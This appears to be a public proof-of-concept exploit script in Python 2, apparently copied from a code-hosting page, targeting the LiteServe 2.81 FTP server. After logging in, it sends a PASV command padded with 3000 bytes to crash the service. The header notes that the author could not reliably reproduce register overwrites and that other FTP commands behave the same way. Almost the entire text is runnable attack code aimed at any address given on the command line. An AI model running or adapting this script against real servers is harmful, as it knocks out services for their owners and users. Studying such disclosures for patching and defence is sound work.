40 lines
No EOL
1,017 B
Python
Executable file
40 lines
No EOL
1,017 B
Python
Executable file
#!/usr/bin/python
|
|
#Title: LiteServe 2.81 PASV Command DoS
|
|
#Author: Craig Freyman (@cd1zz)
|
|
#Date: Bug found July 25, 2011 - Vendor approved release August 7, 2011
|
|
#Tested on Windows XP SP3 and Server 2003 SP2
|
|
#Software: http://www.cmfperception.com/liteserve.html
|
|
#Notes: In certain conditions that I could not reproduce reliably, registers were
|
|
#overwritten. There are a number of other FTP commands that exhibit the same behavior.
|
|
|
|
import socket,sys,time,struct
|
|
|
|
if len(sys.argv) < 2:
|
|
print "[-]Usage: %s <target addr> " % sys.argv[0]
|
|
sys.exit(0)
|
|
|
|
target = sys.argv[1]
|
|
|
|
if len(sys.argv) > 2:
|
|
platform = sys.argv[2]
|
|
|
|
crash = "\x41" * 3000
|
|
|
|
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
|
|
|
try:
|
|
s.connect((target,21))
|
|
except:
|
|
print "[-] Connection to "+target+" failed!"
|
|
sys.exit(0)
|
|
|
|
print "[*] Sending " + `len(crash)` + " byte crash..."
|
|
|
|
s.send("USER test\r\n")
|
|
s.recv(1024)
|
|
s.send("PASS test\r\n")
|
|
s.recv(1024)
|
|
s.send("PASV "+crash+"\r\n")
|
|
print "Sleeping..."
|
|
time.sleep(5)
|
|
s.close() |